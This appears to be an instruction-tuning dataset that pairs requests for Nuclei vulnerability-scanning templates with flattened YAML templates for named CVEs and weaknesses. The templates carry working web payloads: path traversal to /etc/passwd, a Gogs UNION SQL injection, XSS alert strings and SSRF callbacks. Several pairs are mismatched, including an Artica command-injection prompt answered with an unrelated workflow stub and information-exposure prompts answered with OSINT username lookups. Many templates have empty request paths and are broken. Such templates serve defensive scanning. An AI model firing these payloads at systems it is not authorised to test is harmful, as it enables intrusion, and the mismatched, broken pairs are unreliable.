id: CVE-2009-2100 info: name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion author: daffainfo severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. tags: cve2009,cve,joomla,lfi,edb,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd" matchers: - type: regex - type: status status: - 200
cve
medium
CVE-2009-2100
Generate a Nuclei template for: Hongfan OA ioFileExport.aspx - Arbitrary File Read
Title: Hongfan OA ioFileExport.aspx - Arbitrary File Read Summary: Hongfan OA ioFileExport.aspx - Arbitrary File Read. Arbitrary File Read vulnerability in the Hongfan OA ioFileExport.aspx file, through which an attacker can obtain sensitive server information Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: hongfan-ioffice-lfi info: name: Hongfan OA ioFileExport.aspx - Arbitrary File Read author: SleepingBag945 severity: medium description: Arbitrary File Read vulnerability in the Hongfan OA ioFileExport.aspx file, through which an attacker can obtain sensitive server information tags: hongfan,lfi,vuln http: - method: GET path: - "{{BaseURL}}/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename={{filename}}.txt&ContentType=application/octet-stream" matchers: - type: dsl condition: and
generic
medium
hongfan-ioffice-lfi
Generate a Nuclei template for: Gradle Develocity Build Cache Node Login Panel - Detect
Title: Gradle Develocity Build Cache Node Login Panel - Detect Summary: Gradle Develocity Build Cache Node Login Panel - Detect. Gradle Develocity Build Cache Node login panel was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: gradle-develocity-panel info: name: Gradle Develocity Build Cache Node Login Panel - Detect author: righettod severity: info description: Gradle Develocity Build Cache Node login panel was detected. tags: panel,gradle,detect,login,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl condition: and
generic
info
gradle-develocity-panel
Generate a Nuclei template for CVE-2018-19207
Title: Vulnerability (CWE-425) in van-ons wp-gdpr-compliance Summary: The Van Ons WP GDPR Compliance (aka wp-gdpr-compliance) plugin before 1.4.3 for WordPress allows remote attackers to execute arbitrary code because $wpdb->prepare() input is mishandled, as exploited in the wild in November 2018. Vulnerability Type: Vulnerability (CWE-425) Severity: critical Affected Products: van-ons wp-gdpr-compliance Indicators: error, vulnerability detected
id: CVE-2018-19207 info: name: WP GDPR Compliance < 1.4.3 - Unauthenticated Call Any Action or Update Any Option author: iamnoooob,pdresearch severity: critical description: The WP GDPR Compliance plugin allows unauthenticated users to execute any action and update any database value. This vulnerability is due to the lack of proper validation in the Includes/Ajax.php file. tags: cve,cve2018,wordpress,wp-plugin,wp-gdpr-compliance,rce,vkev,vuln http: - method: GET path: matchers: - type: status status: - 200 - method: GET path: matchers: - type: word words: - ""message":""" - ""error":""" part: body_2 condition: and - type: word words: - "application/json" part: content_type_2
cve
critical
CVE-2018-19207
Generate a Nuclei template for: Generic Blind XXE
Title: Generic Blind XXE Summary: Generic Blind XXE. This template detects Generic Blind XXE. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: generic-blind-xxe info: name: Generic Blind XXE author: geeknik severity: high description: This template detects Generic Blind XXE. tags: xxe,generic,blind,vuln http: - method: GET path: matchers: - type: word words: - "http" part: interactsh_protocol
generic
high
generic-blind-xxe
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: couchsurfing info: name: Couchsurfing User Name Information - Detect author: philippedelteil severity: info description: Couchsurfing user name information check was conducted. This OSINT template looks for information about a user name in Couchsurfing.CouchSurfing is a hospitality exchange service by which users can request free short-term homestays or interact with other people who are interested in travel. tags: osint,osint-social,couchsurfing,discovery http: - method: GET path: - "https://www.couchsurfing.com/people/{{user}}" matchers: - type: word words: - "is on Couchsurfing!" - "profile_page" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2010-1954
Title: Path Traversal in joomlacomponent.inetlanka com_multiroot Summary: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. Vulnerability Type: Path Traversal Severity: high Affected Products: joomlacomponent.inetlanka com_multiroot Indicators: error, vulnerability detected
id: CVE-2010-1954 info: name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" matchers: - type: regex - type: status status: - 200
cve
high
CVE-2010-1954
Generate a Nuclei template for CVE-2010-1714
Title: Path Traversal in dev.pucit.edu.pk com_arcadegames Summary: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. Vulnerability Type: Path Traversal Severity: medium Affected Products: dev.pucit.edu.pk com_arcadegames Indicators: error, vulnerability detected
id: CVE-2010-1714 info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" matchers: - type: regex - type: status status: - 200
cve
medium
CVE-2010-1714
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: jeuxvideo info: name: Jeuxvideo User Name Information - Detect author: dwisiswant0 severity: info description: Jeuxvideo user name information check was conducted. tags: osint,osint-gaming,jeuxvideo,discovery http: - method: GET path: - "https://www.jeuxvideo.com/profil/{{user}}?mode=infos" matchers: - type: status status: - 200 - type: word words: - "- jeuxvideo.com" part: body
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2017-11586
Title: Vulnerability (CWE-601) in finecms finecms Summary: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action, related to controllers/Weixin.php. Vulnerability Type: Vulnerability (CWE-601) Severity: medium Affected Products: finecms finecms Indicators: error, vulnerability detected
id: CVE-2017-11586 info: name: FineCMS <5.0.9 - Open Redirect author: 0x_Akoko severity: medium description: FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. tags: cve,cve2017,redirect,finecms,vuln http: - method: GET path: matchers: - type: regex part: header
cve
medium
CVE-2017-11586
Generate a Nuclei template for: Pure-FTPd Service - Detect
Title: Pure-FTPd Service - Detect Summary: Pure-FTPd Service - Detect. Pure-FTPd FTP service was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: pure-ftpd-detect info: name: Pure-FTPd Service - Detect author: pussycat0x severity: info description: Pure-FTPd FTP service was detected. tags: network,ftp,pure-ftpd,detect,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
pure-ftpd-detect
Generate a Nuclei template for CVE-2022-39960
Title: Missing Authorization in netic group_export Summary: The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI. Vulnerability Type: Missing Authorization Severity: medium Affected Products: netic group_export Indicators: error, vulnerability detected
id: CVE-2022-39960 info: name: Jira Netic Group Export <1.0.3 - Missing Authorization author: For3stCo1d severity: medium description: Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. tags: cve,cve2022,atlassian,jira,netic,unauth,vkev,vuln http: - method: GET path: matchers: - type: word words: - ""jiraGroupObjects"" - ""groupName"" part: body condition: and - type: word words: - "attachment" - "jira-group-export" part: header condition: and - type: status status: - 200
cve
medium
CVE-2022-39960
Generate a Nuclei template for: Red Hat Enterprise Linux Test Page
Title: Red Hat Enterprise Linux Test Page Summary: Red Hat Enterprise Linux Test Page. Tags: tech, redhat, discovery Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: default-redhat-test-page info: name: Red Hat Enterprise Linux Test Page author: dhiyaneshDk severity: info description: Red Hat Enterprise Linux Test Page tags: tech,redhat,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Test Page for the Apache HTTP Server on Red Hat Enterprise Linux</title>" part: body
generic
info
default-redhat-test-page
Generate a Nuclei template for CVE-2022-0591
Title: Vulnerability (CWE-918) in subtlewebinc formcraft3 Summary: The FormCraft WordPress plugin before 3.8.28 does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users Vulnerability Type: Vulnerability (CWE-918) Severity: critical Affected Products: subtlewebinc formcraft3 Indicators: error, vulnerability detected
id: CVE-2022-0591 info: name: Formcraft3 <3.8.28 - Server-Side Request Forgery author: Akincibor,j4vaovo severity: critical description: Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "/wp-content/plugins/formcraft3/" - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}" matchers: - type: word words: - "http" part: interactsh_protocol - type: word words: - "User-Agent: WordPress" part: interactsh_request
cve
critical
CVE-2022-0591
Generate a Nuclei template for CVE-2019-15713
Title: Cross-Site Scripting (XSS) in my_calendar_project my_calendar Summary: The my-calendar plugin before 3.1.10 for WordPress has XSS. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: my_calendar_project my_calendar Indicators: error, vulnerability detected
id: CVE-2019-15713 info: name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting author: daffainfo,dhiyaneshDk severity: medium description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,my_calendar_project,vuln http: - method: GET path: matchers: - type: word words: - "My Calendar" - "Tags:" condition: and - method: GET path: - "{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2019-15713
Generate a Nuclei template for: zm-system-log-detect
Title: zm-system-log-detect Summary: zm-system-log-detect. Zm system log file exposed.. Tags: logs, zm, exposure Vulnerability Type: Security Check Severity: low Indicators: vulnerability detected
id: zm-system-log-detect info: name: zm-system-log-detect author: pussycat0x severity: low description: Zm system log file exposed. tags: logs,zm,exposure,discovery http: - method: GET path: - "{{BaseURL}}/?view=log" - "{{BaseURL}}/zm/?view=log" matchers: - type: word words: - "<title>ZM - System Log</title>" - type: status status: - 200
generic
low
zm-system-log-detect
Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page
Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80) Summary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages. Vulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page Severity: medium Indicators: vulnerability detected, error
id: calameo-publications-xss info: name: WordPress Manage Calameo Publications 1.1.0 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: WordPress Manage Calameo Publications 1.1.0 is vulnerable to reflected cross-site scripting via thickbox_content.php and the attachment_id parameter. tags: wordpress,wp-plugin,xss,wp,wpscan,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26" matchers: - type: word words: - "ath_upload_calameo_publication(id\"><script>alert(document.domain)</script>&)" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cwe
medium
CWE-80
Generate a Nuclei template for CVE-2019-7255
Title: Cross-Site Scripting (XSS) in nortekcontrol linear_emerge_essential_firmware and others Summary: Linear eMerge E3-Series devices allow XSS. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: nortekcontrol linear_emerge_essential_firmware, nortekcontrol linear_emerge_elite_firmware Indicators: error, vulnerability detected
id: CVE-2019-7255 info: name: Linear eMerge E3 - Cross-Site Scripting author: arafatansari severity: medium description: Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter. tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol,vuln http: - method: GET path: - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers: - type: word words: - "Template : <script>alert(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2019-7255
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: rg-uac-panel info: name: Ruijie RG-UAC Login Panel - Detect author: princechaddha severity: info description: Ruijie RG-UAC login panel was detected. tags: panel,ruijie,router,firewall,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "dkey_check.php" - "get_dkey_passwd" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template to detect Server-Side Request Forgery
Title: Server-Side Request Forgery (CWE-918) Summary: The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Vulnerability Type: Server-Side Request Forgery Severity: high Indicators: vulnerability detected, error
id: umbraco-base-ssrf info: name: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF) author: dhiyaneshDk severity: medium description: Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack. tags: oast,edb,ssrf,umbraco,vuln http: - method: GET path: - "{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}" - "{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/" - "{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/" matchers: - type: word words: - "http" part: interactsh_protocol - type: dsl
cwe
high
CWE-918
Generate a Nuclei template for CVE-2021-44260
Title: Vulnerability (CWE-306) in wavlink wl-wn531g3_firmware Summary: A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router. Vulnerability Type: Vulnerability (CWE-306) Severity: high Affected Products: wavlink wl-wn531g3_firmware Indicators: error, vulnerability detected
id: CVE-2021-44260 info: name: WAVLINK AC1200 - Information Disclosure author: ritikchaddha severity: high description: A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router. tags: cve,cve2022,wavlink,exposure,ac1200,vuln http: - method: GET path: - "{{BaseURL}}/live_mfg.html" matchers: - type: dsl condition: and
cve
high
CVE-2021-44260
Generate a Nuclei template for: Wazuh - Default Login
Title: Wazuh - Default Login Summary: Wazuh - Default Login. Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: wazuh-default-login info: name: Wazuh - Default Login author: theamanrawat,denandz,PulseSecurity.co.nz severity: high description: Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. tags: wazuh,default-login,vuln http: - method: GET path: - "{{BaseURL}}/app/login" matchers: - type: status status: - 200 - method: GET path: matchers: - type: word words: - ""username":" - ""roles":" part: body condition: and - type: word words: - "application/json" part: header condition: and - type: status status: - 200
generic
high
wazuh-default-login
Generate a Nuclei template for CVE-2021-43510
Title: SQL Injection in simple_client_management_system_project simple_client_management_system Summary: SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php. Vulnerability Type: SQL Injection Severity: critical Affected Products: simple_client_management_system_project simple_client_management_system Indicators: error, vulnerability detected
id: CVE-2021-43510 info: name: Sourcecodester Simple Client Management System 1.0 - SQL Injection author: edoardottt severity: critical description: Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. tags: cve2021,cve,simpleclientmanagement,sqli,auth-bypass,simple_client_management_system_project,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
critical
CVE-2021-43510
Generate a Nuclei template for: Kubelet Stats
Title: Kubelet Stats Summary: Kubelet Stats. Scans for kubelet stats. Tags: tech, k8s, kubernetes Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: kubelet-stats info: name: Kubelet Stats author: sharath severity: info description: Scans for kubelet stats tags: tech,k8s,kubernetes,devops,kubelet,discovery http: - method: GET path: - "{{BaseURL}}/stats/summary" matchers: - type: status status: - 200 - type: word words: - ""node":" - ""nodeName":" part: body condition: and
generic
info
kubelet-stats
Generate a Nuclei template for CVE-2020-17505
Title: OS Command Injection in articatech web_proxy Summary: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. Vulnerability Type: OS Command Injection Severity: high Affected Products: articatech web_proxy Indicators: error, vulnerability detected
id: artica-web-proxy-workflow info: name: Artica Web Proxy Security Checks author: dwisiswant0,pdteam severity: info description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. tags: unknown http: - method: GET path: - "/" matchers: - type: status status: - 200
cve
high
CVE-2020-17505
Generate a Nuclei template for CVE-2014-8682
Title: SQL Injection in gogits gogs Summary: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. Vulnerability Type: SQL Injection Severity: high Affected Products: gogits gogs Indicators: error, vulnerability detected
id: CVE-2014-8682 info: name: Gogs (Go Git Service) - SQL Injection author: dhiyaneshDK,daffainfo severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits,vuln http: - method: GET path: - "{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27" matchers: - type: word words: - ""ok":true" - ""data"" - ""repolink":"" part: body condition: and - type: status status: - 200
cve
high
CVE-2014-8682
Generate a Nuclei template for CVE-2018-16836
Title: Path Traversal in rubedo_project rubedo Summary: Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. Vulnerability Type: Path Traversal Severity: critical Affected Products: rubedo_project rubedo Indicators: error, vulnerability detected
id: CVE-2018-16836 info: name: Rubedo CMS <=3.4.0 - Directory Traversal author: 0x_Akoko severity: critical description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. tags: cve2018,cve,rubedo,lfi,edb,rubedo_project,vkev,vuln http: - method: GET path: - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" matchers: - type: regex - type: status status: - 200
cve
critical
CVE-2018-16836
Generate a Nuclei template to detect Path Traversal
Title: Path Traversal (CWE-22) Summary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escap Vulnerability Type: Path Traversal Severity: high Indicators: unexpected
id: church-admin-lfi info: name: WordPress Church Admin 0.33.2.1 - Local File Inclusion author: 0x_Akoko severity: high description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php. tags: wordpress,wp-plugin,lfi,wpscan,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd" matchers: - type: regex - type: status status: - 200
cwe
high
CWE-22